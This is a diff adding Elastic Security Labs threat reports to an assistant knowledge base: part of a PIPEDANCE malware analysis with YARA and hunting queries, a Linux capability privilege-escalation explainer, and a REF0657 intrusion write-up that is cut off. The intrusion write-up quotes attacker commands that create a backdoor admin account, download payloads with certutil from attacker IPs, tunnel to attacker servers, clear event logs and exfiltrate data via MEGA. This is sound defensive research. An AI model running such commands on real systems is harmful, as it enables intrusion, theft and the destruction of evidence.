+
+This method generates a seed value based on the current time and passes it to a pseudorandom number generator that returns a value between 0 and 5. This value determines which of 6 hard-coded binaries ( **makecab.exe** , **typeperf.exe** , **w32tm.exe** , **bootcfg.exe** , **diskperf.exe** , **esentutl.exe** ) is used.
+
+![Hardcoded binaries that PIPEDANCE can use as injection targets](/assets/images/twice-around-the-dance-floor-with-pipedance/image1.jpg)
+
+Below is an example of the Windows APIs used with the thread hijacking technique when PIPEDANCE is running under a 32-bit architecture.
+
+![PIPEDANCE performs thread hijacking](/assets/images/twice-around-the-dance-floor-with-pipedance/image11.jpg)
+
+If the processor architecture is 64-bit, PIPEDANCE will use the Heaven’s Gate technique calling Native API functions ( **NtGetContextThread** , **NtWriteVirtualMemory** , **RtlCreateUserThread** ), switching the CPU to 64-bit, and executing shellcode.
+
+![PIPEDANCE using Heaven’s Gate for 64-bit architectures](/assets/images/twice-around-the-dance-floor-with-pipedance/image21.jpg)
+
+![PIPEDANCE calling NtWriteVirtualMemory for injection](/assets/images/twice-around-the-dance-floor-with-pipedance/image8.jpg)
+
+PIPEDANCE also supports other methods of injection using **CreateRemoteThread** or through a Heaven’s Gate call to **RtlCreateUserThread**. With this function, instead of choosing from the previously hardcoded list, the operator provides the PID for the injection target.
+
+![PIPEDANCE allowing operator-supplied injection targets](/assets/images/twice-around-the-dance-floor-with-pipedance/image13.jpg)
+
+## Summary
+
+PIPEDANCE is designed to conduct covert operations using named pipes and has various features to enable the post-compromise stage. In terms of capabilities, it reminds us of an offensive attack framework's SMB module, but with its own customization. While leveraging named pipes is not a novel technique, it's interesting to see how it's been implemented as a command and control internal proxy and represents an in-house development capability.
+
+## Detection logic
+
+### Prevention
+
+- Memory Threat Prevent Alert: Shellcode Injection
+
+### Detection
+
+- [Suspicious Windows Service Execution](https://github.com/elastic/endpoint-rules/blob/main/rules/privilege_escalation_suspicious_services_child.toml)
+- [NullSessionPipe Registry Modification](https://www.elastic.co/guide/en/security/current/nullsessionpipe-registry-modification.html)
+- [Potential Lateral Tool Transfer via SMB Share](https://www.elastic.co/guide/en/security/master/potential-lateral-tool-transfer-via-smb-share.html)
+
+#### Hunting queries
+
+The events for both KQL and EQL are provided with the Elastic Agent using the Elastic Defend integration. Hunting queries could return high signals or false positives. These queries are used to identify potentially suspicious behavior, but an investigation is required to validate the findings.
+
+##### KQL queries
+
+Using the Discover app in Kibana, the below query will identify network connections coming from the hardcoded injection targets within PIPEDANCE.
+
+```
+process.name:("makecab.exe" or "typeperf.exe" or  "w32tm.exe" or "bootcfg.exe" or "diskperf.exe" or "esentutl.exe") and event.dataset: endpoint.events.network
+```
+
+#### YARA
+
+Elastic Security has created a [YARA rule](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_PipeDance.yar) to identify this activity. Below is the YARA rule to identify PIPEDANCE.
+
+```
+rule Windows_Trojan_PipeDance {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2023-02-02"
+        last_modified = "2023-02-02"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "PipeDance"
+        threat_name = "Windows.Trojan.PipeDance"
+        license = "Elastic License v2"
+    strings:
+        $str1 = "%-5d %-30s %-4s %-7d %s" wide fullword
+        $str2 = "PID   Name                           Arch Session User" wide fullword
+        $str3 = "%s %7.2f B" wide fullword
+        $str4 = "\\\\.\\pipe\\%s.%d" ascii fullword
+        $seq_rc4 = { 8D 46 ?? 0F B6 F0 8A 14 3E 0F B6 C2 03 C1 0F B6 C8 89 4D ?? 8A 04 0F 88 04 3E 88 14 0F 0F B6 0C 3E 0F B6 C2 03 C8 0F B6 C1 8B 4D ?? 8A 04 38 30 04 0B 43 8B 4D ?? 3B 5D ?? 72 ?? }
+        $seq_srv_resp = { 8B CE 50 6A 04 5A E8 ?? ?? ?? ?? B8 00 04 00 00 8D 4E ?? 50 53 8B D0 E8 ?? ?? ?? ?? B8 08 02 00 00 8D 8E ?? ?? ?? ?? 50 57 8B D0 E8 ?? ?? ?? ?? }
+        $seq_cmd_dispatch = { 83 FE 29 0F 87 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FE 06 0F 87 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B C6 33 D2 2B C2 0F 84 ?? ?? ?? ?? 83 E8 01 }
+        $seq_icmp = { 59 6A 61 5E 89 45 ?? 8B D0 89 5D ?? 2B F0 8D 04 16 8D 4B ?? 88 0A 83 F8 77 7E ?? 80 E9 17 88 0A 43 42 83 FB 20 }
+    condition:
+        4 of ($str*) or 2 of ($seq*)
+}
+```
+
+## Observed adversary tactics and techniques
+
+Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.
+
+### Tactics
+
+Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+- [Reconnaissance](https://attack.mitre.org/tactics/TA0043/)
+- [Execution](https://attack.mitre.org/tactics/TA0002)
+- [Defense evasion](https://attack.mitre.org/tactics/TA0005)
+- [Discovery](https://attack.mitre.org/tactics/TA0007)
+- [Lateral movement](https://attack.mitre.org/tactics/TA0008/)
+- [Collection](https://attack.mitre.org/tactics/TA0009)
+- [Command and control](https://attack.mitre.org/tactics/TA0011/)
+- [Exfiltration](https://attack.mitre.org/tactics/TA0010/)
+
+### Techniques / Sub techniques
+
+Techniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.
+
+- [Gather victim network information](https://attack.mitre.org/techniques/T1590/)
+- [File and directory discovery](https://attack.mitre.org/techniques/T1083/)
+- [Process discovery](https://attack.mitre.org/techniques/T1057/)
+- [Process injection: thread execution hijacking](https://attack.mitre.org/techniques/T1055/003/)
+- [Token impersonation/theft](https://attack.mitre.org/techniques/T1134/001/)
+- [Lateral tool transfer](https://attack.mitre.org/techniques/T1570/)
+- [Internal proxy](https://attack.mitre.org/techniques/T1090/001/)
+- [Inter-Process communication](https://attack.mitre.org/techniques/T1559/)
+- [Application layer protocol](https://attack.mitre.org/techniques/T1071/)
+- [Obfuscated files or information](https://attack.mitre.org/techniques/T1027)
+- [Create or modify system process: Windows service](https://attack.mitre.org/techniques/T1543/003/)
+
+## Observables
+
+All observables are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf10ee41eec4f6caf/63fcd87852820c02597c04f3/1326-indicators.zip) in both ECS and STIX format in a combined zip bundle.
+
+The following observables were discussed in this research.
+
+| Indicator                                                        | Type    | Reference                       |
+| ---------------------------------------------------------------- | ------- | ------------------------------- |
+| 9d3f739e35182992f1e3ade48b8999fb3a5049f48c14db20e38ee63eddc5a1e7 | SHA-256 | PIPEDANCE server-side component |
+| 805a4250ec1f6b99f1d5955283c05cd491e1aa378444a782f7bd7aaf6e1e6ce7 | SHA-256 | Cobalt Strike beacon            |
+| exl.officeappsreviews[.]com/lanche-334e58sfj4eeu7h4dd3sss32d     | URL     | Cobalt Strike C2 server         |
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/unlocking_power_safely_privilege_escalation_via_linux_process_capabilities.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/unlocking_power_safely_privilege_escalation_via_linux_process_capabilities.md
new file mode 100644
index 0000000000000..168e0c0c032ac
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/unlocking_power_safely_privilege_escalation_via_linux_process_capabilities.md
@@ -0,0 +1,122 @@
+---
+title: "Unlocking Power Safely: Privilege Escalation via Linux Process Capabilities"
+slug: "unlocking-power-safely-privilege-escalation-via-linux-process-capabilities"
+subtitle: ""
+date: "2024-03-27"
+description: "Organizations need to understand how Linux features contribute to their attack surface via privilege escalation and how to effectively monitor intrusion attempts using free and open detection capabilities."
+author:
+  - slug: shashank-k-s
+image: "Security Labs Images 36.jpg"
+category:
+  - slug: security-operations
+tags:
+  - linux
+  - privilege-escalation
+---
+
+## Preamble
+
+In the realm of Linux security, administrators constantly grapple with a delicate balance between safeguarding sensitive system resources and accessibility. One helpful avenue that has garnered considerable attention in recent years is privilege escalation via Linux process capabilities. While traditional Unix-like permissions offer coarse-grained control over access rights, process capabilities provide a nuanced approach, allowing specific processes to wield elevated privileges without necessitating full root access.
+
+This publication delves into the intricate world of privilege escalation through Linux process capabilities, unraveling its mechanisms, implications, and indispensable role in fortifying system security. Organizations need to understand how Linux features contribute to their attack surface via privilege escalation and how to effectively monitor intrusion attempts using free and open detection capabilities.
+
+## Linux Process Capabilities
+
+Linux process capabilities allow users to fine-tune the permissions and privileges of processes running on a Linux system. Traditionally, Linux used a simple binary approach to process permissions: either a process ran with full root privileges (superuser) or a regular user's limited privileges.
+
+However, this binary approach needed to be more flexible for security use cases, especially those requiring elevated privileges for only certain operations. To address this, Linux introduced capabilities that allow processes to have a subset of the privileges traditionally associated with the root user. These capabilities are managed using the “substitute user, do” (```sudo```) subsystem. By comparison, process capabilities provide a more granular way to grant specific privileges to processes. The ```sudo``` command allows users to temporarily escalate their privileges to execute administrative tasks as the superuser or another user.
+
+Here's how Linux process capabilities work:
+
+ 1. **Role-based privileges**: In the traditional Unix security model, the superuser (root) has unrestricted access to all system resources and operations. Any process running with root privileges can perform any action on the system.
+
+ 2. **Capability-based privileges**: With capabilities, specific privileges are split from the root user's authority and can be assigned to processes individually. This allows processes to be granted only the specific privileges they need to perform their tasks rather than granting them full root access. Capabilities can be assigned to individual executable files or running processes. When an executable file is launched, it can be configured to retain or drop certain capabilities. Similarly, capabilities can be added or removed from a running process using tools like `setcap` (to set file capabilities) or `capsh` (to create a capability shell wrapper).
+
+
+ 3. **Capability groups**: Linux capabilities are divided into distinct types, each representing a different set of privileges. Some examples of capabilities include ```CAP_SYS_ADMIN``` (perform a range of system administration tasks), ```CAP_NET_ADMIN``` (configure network interfaces), and ```CAP_DAC_OVERRIDE``` (bypass file read/write permission checks). 
+
+ 4. **Effective and permitted capabilities**: Each process has two sets of capabilities—the effective and permitted sets. The effective set determines which capabilities the process can use at any given time, while the permitted set determines which capabilities it can gain via privilege escalation.
+
+ 5. **Capability bounding set**: A bounding set of capabilities defines a ceiling on the capabilities a process can acquire, even through privilege escalation. This is a security feature to prevent unauthorized elevation of privileges.
+
+Linux process capabilities offer a more granular approach to managing privileges, enhancing security by reducing processes' attack surface while still allowing them to perform necessary tasks - of course, subject to operator error! They're particularly useful in scenarios where certain operations require elevated permissions, but granting full root access would be excessive and potentially risky.
+
+## Privilege Escalation via Linux process capabilities
+
+Privilege escalation via Linux process capabilities involves exploiting misconfigurations or vulnerabilities to gain additional privileges beyond a process's intended purpose. While capabilities are meant to provide a more granular and secure approach to privilege management, they can still be misused or misconfigured, leading to potential security risks. This section will explore some ways privilege escalation via process capabilities can occur.
+
+ 1. **Incorrectly set capabilities**: If an executable file has capabilities assigned to it that it doesn't need to perform its intended functions, an attacker could potentially exploit this by running the file to gain those extra privileges.
+  - The risk: An attacker could exploit a misconfiguration where a binary has unnecessary set user identity (```setuid```) capabilities assigned to it. The attacker can access those capabilities by executing the binary, potentially escalating their privileges.
+  - Example: Suppose a setuid binary ```/usr/bin/example_binary``` has the ```CAP_SYS_ADMIN``` capability set. An attacker could exploit this capability by executing the binary and gaining elevated privileges if it is unnecessary.
+
+ 2. **Capability leaking**: Sometimes capabilities from its parent process. If a parent process has more capabilities than necessary and spawns a child process, the child process could inherit these capabilities, potentially giving it more privileges than intended.
+  - The risk: If a privileged parent process spawns a child process without dropping unnecessary capabilities, it may inherit capabilities it doesn't require.
+  - Example: A web server process runs with elevated privileges due to its requirements but spawns a child process to handle user requests. When a web server spawns child processes, it typically does so to handle incoming client requests efficiently. Each child process is responsible for servicing one or more client connections, allowing the web server to handle multiple requests concurrently. However, in certain scenarios, child processes spawned by a web server might inadvertently inherit unnecessary privileges or capabilities that the web server doesn't require. This can introduce security risks, as these child processes might have access to capabilities or resources beyond what is necessary to serve web requests. When a web server spawns child processes using a generic process creation mechanism without explicitly dropping unnecessary privileges or capabilities, these child processes might inherit the capabilities of the parent process. This could include capabilities such as creating raw network sockets, manipulating the firewall, or accessing sensitive files or system resources.
+
+ 3. **Exploiting vulnerable setuid/setgid binaries**: Some ```setuid``` or ```setgid``` binaries may have capabilities assigned to them. If an attacker can abuse one of these binary misconfigurations, they may be able to execute arbitrary code with the elevated capabilities granted to the binary, leading to privilege escalation.
+  - The risk: Exploiting vulnerabilities in setuid or setgid binaries with elevated capabilities can lead to privilege escalation.
+  - Example: A vulnerable ```setuid``` binary, such as ```/bin/su```, may have a flaw that allows an attacker to execute arbitrary code with elevated capabilities, effectively escalating their privileges to root.
+
+ 4. **Kernel vulnerabilities**: Since the Linux kernel enforces capabilities, vulnerabilities in the kernel could potentially be exploited to bypass capability checks and gain elevated privileges.
+  - The risk: Vulnerabilities in the Linux kernel itself could be exploited to bypass capability checks and gain elevated privileges.
+  - Example: Suppose a kernel vulnerability allows an attacker to manipulate capability checks. By exploiting this vulnerability, an attacker could bypass capability checks and gain access to capabilities they are not supposed to have.
+
+ 5. **Capability bounding set misconfiguration**: If the capability bounding set is not properly configured, processes could gain additional capabilities through privilege escalation techniques..
+  - The risk: An attacker could exploit the capability bounding set to gain additional capabilities through techniques such as using the ```ptrace``` system call to observe and control the execution of another process.
+  - Example: An attacker could abuse a misconfigured capability bounding set to allow their malicious process to trace and control another process, effectively gaining its capabilities.
+
+ 6. **Abusing file attributes**: Linux filesystems support extended attributes, including file capabilities. If an attacker gains control of a file with elevated capabilities, they may be able to execute the file and gain those capabilities, potentially leading to privilege escalation.
+  - The risk: Exploiting extended attributes, including file capabilities, could allow an attacker to execute a file with elevated capabilities, leading to privilege escalation.
+  - Example: An attacker could gain control of a file with elevated capabilities, such as ```CAP_NET_ADMIN```, and execute it to gain those capabilities, potentially escalating their privileges to perform network-related tasks beyond their intended scope.
+
+## Mitigating the risks of Privilege Escalation
+
+Mitigating privilege escalation via process capabilities involves implementing several security best practices to reduce the risk of unauthorized access to elevated privileges. Here are some key practices to consider:
+
+ 1. **Least Privilege Principle**: Follow the principle of least privilege by assigning only the necessary capabilities to processes and users. Limit capabilities to what is required for specific tasks, avoiding assigning unnecessary privileges.
+
+ 2. **Regular Auditing and Review**: Conduct regular audits and reviews of the capabilities assigned to executable files, processes, and users. Ensure that capabilities are accurately assigned based on the principle of least privilege.
+
+ 3. **Secure Configuration of Setuid/Setgid Binaries**:  Review and restrict capabilities assigned to these binaries to prevent unauthorized privilege escalation.
+
+ 4. **Capability Bounding Set Configuration**: Properly configure the capability bounding set to restrict the capabilities acquired through privilege escalation techniques such as ```ptrace```. Limit the capabilities available to processes, especially those with elevated privileges.
+
+ 5. **Kernel and Software Updates**: The Linux kernel and all software components should be updated with the latest security patches. Updates should be applied regularly to mitigate potential vulnerabilities that could be exploited for privilege escalation.
+
+ 6. **Security Hardening**: Implement security hardening measures to strengthen the system's overall security posture. This includes configuring and deploying security-enhancing mechanisms such as SELinux (Security-Enhanced Linux) or AppArmor to enforce mandatory access controls and confinement policies.
+
+ 7. **Filesystem Integrity Checks**: Implement filesystem integrity checks to detect unauthorized changes to files, including those with extended attributes such as capabilities. 
+
+ 8. **Monitoring and Logging**: Implement robust monitoring and logging mechanisms to detect and track suspicious activities related to privilege escalation attempts. Monitor system logs, audit trails, and security events to identify unauthorized access attempts or unusual behavior.
+
+With all these measures in place to mitigate the risks of privilege escalation via Linux process capabilities, leaks can make it to the infrastructure providing a window of opportunity to exploit and gain control. The next section describes how Elastic Security helps detect privilege escalation use cases for process capabilities.
+
+## Detect Privilege Escalation using Elastic Security 
+	
+In [Elastic 8.11](https://www.elastic.co/blog/whats-new-elastic-security-8-11-0) new detection rules were added to detect discovery and privilege escalation of Linux process capabilities. Users can leverage these Elastic prebuilt rules by following the guidelines to [install and manage elastic prebuilt rules](https://www.elastic.co/guide/en/security/8.11/prebuilt-rules-management.html).  To enable and organize these specific rules refer to the [manage detection rules](https://www.elastic.co/guide/en/security/8.11/rules-ui-management.html) guidelines. 
+
+To gain visibility around Linux Process Capabilities, users can also search from the below list for specific prebuilt rules to enable them:
+ - [Process Capability Enumeration](https://www.elastic.co/guide/en/security/current/process-capability-enumeration.html)
+ - [Potential Privilege Escalation via Linux DAC permissions](https://www.elastic.co/guide/en/security/current/potential-privilege-escalation-via-linux-dac-permissions.html)
+ - [Potential Privilege Escalation via Enlightenment](https://www.elastic.co/guide/en/security/current/potential-privilege-escalation-via-enlightenment.html)
+ - [Privilege Escalation via GDB CAP_SYS_PTRACE](https://www.elastic.co/guide/en/security/current/privilege-escalation-via-gdb-cap-sys-ptrace.html)
+ - [Root Network Connection via GDB CAP_SYS_PTRACE](https://www.elastic.co/guide/en/security/current/root-network-connection-via-gdb-cap-sys-ptrace.html)
+ - [Privilege Escalation via CAP_CHOWN/CAP_FOWNER Capabilities](https://www.elastic.co/guide/en/security/current/privilege-escalation-via-cap-chown-cap-fowner-capabilities.html)
+ - [Privilege Escalation via CAP_SETUID/SETGID Capabilities](https://www.elastic.co/guide/en/security/current/privilege-escalation-via-cap-setuid-setgid-capabilities.html)
+ - Some Building Block Rules 
+  - [Network Traffic Capture via CAP_NET_RAW](https://www.elastic.co/guide/en/security/current/network-traffic-capture-via-cap-net-raw.html)
+  - [CAP_SYS_ADMIN Assigned to Binary](https://www.elastic.co/guide/en/security/current/cap-sys-admin-assigned-to-binary.html)
+
+_Important Elastic Infrastructure Note_: Stack + Agent + Policy are all advised to be on 8.11+ for capturing Linux Process capabilities. Of the available Linux Process Thread capability sets, only the below two sets are captured on Elastic 8.11+ Elastic Infrastructure.
+ - `CapPrm` (Permitted capabilities) are the capabilities that a process can have.
+ - `CapEff` (Effective capabilities) set is all the capabilities with which the current process is executed.
+
+## Conclusion
+
+In the realm of Linux security, understanding and effectively leveraging process capabilities for privilege escalation is paramount. By granting specific processes elevated privileges without resorting to full root access, this mechanism enhances the security posture of systems by limiting the potential impact of compromised processes. However, this power comes with greater responsibility; misconfigurations or misuse of process capabilities can introduce new avenues for exploitation.
+
+We've uncovered the nuanced interplay between process capabilities and traditional permission models, such as sudo, highlighting their complementary roles in access control. As administrators, it's imperative to implement robust practices for managing and auditing process capabilities, ensuring that only trusted processes are granted the necessary privileges.
+
+Furthermore, as the Linux ecosystem continues to evolve, maintaining awareness of updates and best practices in process capability management is essential. Through vigilance, education, and the adoption of security-first principles, we can fortify our systems against emerging threats while maintaining the flexibility and functionality necessary for modern computing environments. 
+
+With Elastic Defend’s proactive approach to privilege escalation via Linux process capabilities, we can bolster the security foundations of our systems and safeguard against potential exploits in an ever-changing threat landscape.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/unmasking_financial_services_intrusion_ref0657.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/unmasking_financial_services_intrusion_ref0657.md
new file mode 100644
index 0000000000000..45f8b051ec919
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/unmasking_financial_services_intrusion_ref0657.md
@@ -0,0 +1,325 @@
+---
+title: "Unmasking a Financial Services Intrusion: REF0657"
+slug: "unmasking-financial-services-intrusion-ref0657"
+subtitle: "Elastic Security Labs details an intrusion leveraging open-source tooling and different post-exploitation techniques targeting the financial services industry in South Asia."
+date: "2024-01-31"
+description: "Elastic Security Labs details an intrusion leveraging open-source tooling and different post-exploitation techniques targeting the financial services industry in South Asia."
+author:
+  - slug: daniel-stepanic
+  - slug: salim-bitam
+  - slug: andrew-pease
+image: "photo-edited-08@2x.jpg"
+category:
+  - slug: attack-pattern
+tags:
+  - ref0657
+  - nps
+  - cobalt strike
+  - iox
+  - rakshasa
+  - supershell
+---
+
+## Preamble
+
+In December of 2023, Elastic Security Labs detected a smash-and-grab style intrusion directed at a financial services organization in South Asia. Throughout the breach, a diverse set of open-source tools were employed within the victim's environment, some of which we encountered for the first time. The threat group engaged in different post-compromise activities: from discovery/enumeration to utilizing the victim's internal enterprise software against them and eventually leveraging different tunnelers and side-loading techniques to execute Cobalt Strike. In addition, the adversary used the file hosting service Mega to exfiltrate data from the network.
+
+By disclosing the details of this intrusion set (REF0657) and the various tactics, techniques, and procedures (TTPs), we hope to assist fellow defenders and organizations in recognizing and monitoring this type of activity. 
+
+### Key takeaways
+
+* REF0657 targeted financial services in South Asia
+* This group leveraged a broad range of post-compromise behaviors, including backdoor access using Microsoft SQL Server, dumping credentials, wiping event logs, and exfiltrating data using MEGA CMD
+* The activity included an assortment of network tunnelers and proxy tools as well as Cobalt Strike and ties to infrastructure using the C2 framework, Supershell
+
+## Campaign analysis 
+
+Our team identified the initial enumeration happening in a customer environment on December 17, 2023. While we didn't have visibility around the root cause of the infection, we continued to monitor the environment. Over the next several weeks, we discovered seven different hosts, mainly servers, exhibiting a large swath of activity, including:
+
+* Discovery/enumeration
+* Downloading additional tools/components
+* Renaming and staging tools in legitimate folder locations in the environment
+* Dumping credentials from the registry and adding users to machines
+* Modifying the environment to enable lateral movement and persistence
+* Executing proxy tunnelers and shellcode to maintain access into the environment
+* Compressing and exfiltrating data using cloud services provider Mega
+* Wiping event logs on multiple machines 
+
+## Execution Flow / Timeline
+
+A significant portion of the activity observed by our team came through command-line execution abusing Microsoft SQL Server (`sqlservr.exe`). While we couldn’t pinpoint the root cause, we have reason to believe the attacker gained access to the environment through this remotely accessible server and then started executing commands and running programs using the MSSQL’s stored procedure (`xp_cmdshell`). This initial endpoint served as the beachhead of the attack where all activity seemed to originate from here.
+
+### Discovery/Enumeration/Staging
+
+The threat actor used several standard Windows utilities for initial discovery and enumeration. The following graphic shows the different commands spawned from the parent process (`sqlservr.exe`):
+
+![Observed command-lines associated with discovery](/assets/images/unmasking-financial-services-intrusion-ref0657/image9.png "Observed command-lines associated with discovery")
+
+
+Oftentimes, the attacker checked to verify their payloads were running, reviewed network connections on victim machines, and performed directory listings to check on their different files.
+
+After initial access was gained, the actor tried several methods for downloading additional payloads and tooling. The adversary started to use `certutil.exe` and then moved to `bitsadmin.exe`, PowerShell’s `DownloadFile()` method, and eventually back to `certutil.exe`. These different tools interacted with IP addresses (`149.104.23[.]17` and `206.237.3[.]150`).
+
+![Observed command-lines associated with staging](/assets/images/unmasking-financial-services-intrusion-ref0657/image10.png "Observed command-lines associated with staging")
+
+
+### Lateral Movement + Persistence
+
+As the actors moved in the environment, they leveraged remote SMB and WMI to create a local administrator account named "helpdesk" on each machine. In some cases, they set up a randomly named Windows service (`qLVAMxSGzP`) as a persistence mechanism. This service would execute a temporary batch file with commands to add a local user and insert this user into the local administrator group. After execution, the file would then be deleted. 
+
+```
+%COMSPEC% /Q /c echo net user helpdesk P@ssw0rd /add && \ 
+net localgroup administrators helpdesk /add \ 
+^> \\127.0.0.1\C$\FOUGTZ 2^>^&1 > %TEMP%\VOruiL.bat & \ 
+%COMSPEC% /Q /c %TEMP%\VOruiL.bat & %COMSPEC% /Q /c del %TEMP%\VOruiL.bat
+```
+
+### Execution
+
+The adversary moved to Cobalt Strike for C2 and further execution. This time, they used a legitimately signed version of Trend Micro’s Deep Security Monitor (`ds_monitor.exe`). This was used to load Cobalt Strike by side-loading a malicious DLL (`msvcp140.dll`). We observed the download of the DLL from a `certutil.exe` execution, and then we confirmed this behavior via call stack telemetry.
+
+```
+"C:\Windows\system32\cmd.exe" /c certutil -urlcache -split -f \ 
+ht""""tp://206.237.3[.]150:443/1.txt \ 
+C:\users\public\downloads\msvcp140.dll
+```
+
+The screenshot below shows that the actor placed the TrendMicro application inside a directory labeled McAfee in ProgramData. We can see the malicious DLL being loaded from the same directory by checking the call stack.
+
+![Malicious DLL side-loading of msvcp140.dll](/assets/images/unmasking-financial-services-intrusion-ref0657/image2.png "Malicious DLL side-loading of msvcp140.dll")
+
+
+Shortly after, Run Key persistence was added to execute (`ds_monitor.exe`) on system startup.
+
+```
+reg  add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v \ 
+TrendMicro /t REG_SZ /d \ 
+"C:\ProgramData\McAfee\TrendMicro\ds_monitor.exe" /f /reg:64
+```
+
+An analysis on `msvcp140.dll` reveals that the threat actor tampered with the DllEntryPoint of the legit Windows DLL by substituting it with modified code sourced from a public [repository](https://github.com/ShadowMccc/MemoryEvasion) - this is a custom Cobalt Strike memory evasion loader.
+
+![Decompiled Sleep Obfuscation loading Cobalt Strike](/assets/images/unmasking-financial-services-intrusion-ref0657/image6.png "Decompiled Sleep Obfuscation loading Cobalt Strike")
+
+
+While the original code retrieved the Cobalt Strike beacon from memory, the altered version loads a beacon in base64 format from a file named `config.ini` that connects to `msedge[.]one`.
+
+### Dumping credentials
+
+One of the main methods observed for gathering credentials was dumping the Security Account Manager (SAM) registry hive on different servers.
+
+![Events showing SAM registry dump](/assets/images/unmasking-financial-services-intrusion-ref0657/image11.png "Events showing SAM registry dump")
+
+
+### Network/Registry/Logging Modifications 
+
+The threat actor modified several different configurations and settings to help further increase their access to the environment. One of our first observations of this behavior was [enabling RDP](https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-terminalservices-localsessionmanager-fdenytsconnections) (set value to 0) through the registry at the following path (`HKLM\SYSTEM\ControlSet001\Control\Terminal Server\fDenyTSConnections)`. Then, they disabled the Windows Firewall rules using the command:` NetSh Advfirewall set allprofiles state off`.
+
+Afterward, they enabled [Restricted Admin](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn408190(v=ws.11)#restricted-admin-mode-for-remote-desktop-connection) mode through a registry modification, this allowed the adversary to conduct pass-the-hash style attacks against Remote Desktop Protocol (RDP). 
+
+```
+cmd.exe /Q /c REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" \ 
+/v DisableRestrictedAdmin /t REG_DWORD /d 00000000 \ 
+/f 1> \\127.0.0.1\C$\Windows\Temp\RExePi 2>&1
+```
+
+In addition to these changes, the attacker also wiped the Windows event logs for System and Security notifications using the Windows Event Utility, `wevtutil.exe`:
+
+```
+cmd.exe /Q /c wevtutil.exe cl System 1> \ 
+\\127.0.0.1\C$\Windows\Temp\ksASGt 2>&1
+
+cmd.exe /Q /c wevtutil.exe cl Security 1> \ 
+\\127.0.0.1\C$\Windows\Temp\uhxJiw 2>&1
+```
+
+### Tunneling/Proxy Tools
+
+After a day of initial access, the adversary generated several shellcode injection alerts using `AppLaunch.exe` (a binary that manages and executes applications built with Microsoft's .NET Framework) and outputting the results to a file called `1.txt`. The command line argument associated with this alert is as follows: `c:\programdata\AppLaunch.exe proxy -r 206.237.0[.]49:12355 >> 1.txt`
+
+After examining the injected code, we identified the shellcode as a Golang binary known as `iox`, which can be compiled from the following publicly available [repository](https://github.com/EddieIvan01/iox). This tool is designed for port forwarding and proxying with additional features such as traffic encryption. Based on the observed command line, the attacker established a proxy connection to `206.237.0[.]49` on port `12355`.
+
+Intended or not, the proxy utility was launched by several different legitimate processes: `lsass.exe`, `vmtoolsd.exe`, and `mctray.exe`. In this case, the threat actor side-loaded a common malicious unsigned DLL (`mscoree.dll`) located in the `C:\programdata\` directory.
+
+![Malicious DLL side-loading of mscoree.dll](/assets/images/unmasking-financial-services-intrusion-ref0657/image5.png "Malicious DLL side-loading of mscoree.dll")
+
+
+The actor employed another proxy known as [Rakshasa](https://github.com/Mob2003/rakshasa), downloaded directly from the tool's official GitHub page using the `certutil` command. It was stored in `c:\users\public\downloads\ra.exe`, and then executed with the following command:
+`C:\Windows\system32\cmd.exe /C C:\Users\Public\Downloads\ra.exe -d 149.104.23[.]176:80`.
+
+This command creates a proxy tunnel to the threat actor infrastructure, connecting to the IP address `149.104.23.176` on port `80`. If that wasn’t enough, the actor started to send and retrieve data from the network through ICMP tunneling. For example, when the actor executed the tasklist command, the output was saved to `C:\programdata\re.txt`, and exfiltrated through ICMP using PowerShell.
+
+![ICMP tunneling script using PowerShell](/assets/images/unmasking-financial-services-intrusion-ref0657/image8.png "ICMP tunneling script using PowerShell")
+
+
+### Exfiltration
+
+One of the more noteworthy parts of this intrusion was centered around the adversary downloading [MEGA Cmd](https://mega.io/cmd), a command-line utility that works with the Mega file hosting service. While still leveraging MSSQL, they downloaded this program, renaming it to `ms_edge.exe`.
+
+```
+"C:\Windows\system32\cmd.exe" /c certutil -urlcache -split -f \ 
+ht""""tp://206.237.3.150:443/megacmd.exe \ 
+C:\users\public\downloads\ms_edge.exe
+```
+
+Shortly after, we observed this utility being executed with an argument to a configuration file (called `tmp`) and a compressed file stored with a backup extension (`.bak`) being used in conjunction with Mega.
+
+```
+C:\users\public\downloads\ms_edge.exe  --config \ 
+C:\users\public\downloads\tmp copy \ 
+REDACTED_FILENAME.bak mega_temp:
+```
+
+### Infrastructure
+
+Throughout this investigation, the threat group used several servers to host their payloads or forward network traffic. The Elastic Security Labs team discovered two web servers with open directories hosting files publicly reachable on: 
+
+* `206.237.3[.]150`
+* `206.237.0[.]49` 
+
+![Open directory at 206.237.3[.]150](/assets/images/unmasking-financial-services-intrusion-ref0657/image3.png "Open directory at 206.237.3[.]150")
+
+
+In addition, our team observed [Supershell](https://github.com/tdragon6/Supershell/tree/main) panel, a Chinese-based C2 platform running on `206.237.[0].49:8888`.
+
+![Supershell Panel on 206.237.0[.]49](/assets/images/unmasking-financial-services-intrusion-ref0657/image1.png "Supershell Panel on 206.237.0[.]49")
+
+
+We validated an earlier finding in the previous section when we found a configuration file (referred to as `tmp` in the Exfiltration section) used for automation with the Mega platform containing credentials used by the adversary. As well, there was a variety of web shell files and scripts originating from the following public repositories:
+
